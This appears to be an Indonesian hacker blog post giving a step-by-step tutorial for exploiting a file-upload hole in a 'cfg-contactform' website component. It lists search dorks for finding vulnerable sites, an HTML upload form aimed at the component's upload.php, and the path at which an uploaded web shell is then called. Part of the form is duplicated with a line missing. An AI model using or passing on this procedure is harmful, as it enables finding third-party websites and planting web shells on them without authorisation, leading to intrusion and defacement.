Ketemu Lagi Ama Saya Sitamvan Dari Gua Hantu :v :v
Sekarang Saya Akan Ngeshare Tutorial "Cfg-ContactForm File Upload Vulnerable"
Klau Gitu , Langsung Aja Baca Artikel Dibawah Ini Vro :D
DORK : "index of" "cfg-contact-from-1" atau bisa jg "index of" "cfg-contact-from-2"
tergantung webnya doang :v
CSRF :
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
Cari Target nya dulu dengan dork yg diatas :v .
Klau udah dapat langsung aja tambah di belakang web kyak gni
http://target.com/cfg-contactform-1/inc/upload.php
Klau Vuln Nanti Ada Tulisan {filename} blablabla :v
Klau Vuln Nanti Ada Tulisan {filename} blablabla :v
Klau udah sisa upload doang pake CSRF yang diatas tadi :D
Klau udah di upload , cara manggil shellnya gini : target.com/cfg-contactform-1/upload/shellmu.php
Ok gitu aja kok .
Klau ada salah ketik atau salah paham mohon di maafkan :v
Exploit Author : People_hurt a.k.a Ariel Peterpan | Incef Team
Thanks To : PhantomGhost - Sulawesi IT Sec - Mr.3RR0R
My Facebook : https://www.facebook.com/marselERROR
Fanspage : https://www.facebook.com/Ghosts.phtml - https://mobile.facebook.com/Mr3RR0R-1605930586394122/
0 Comment to "Cfg-ContactForm File Upload Vulnerable"
Posting Komentar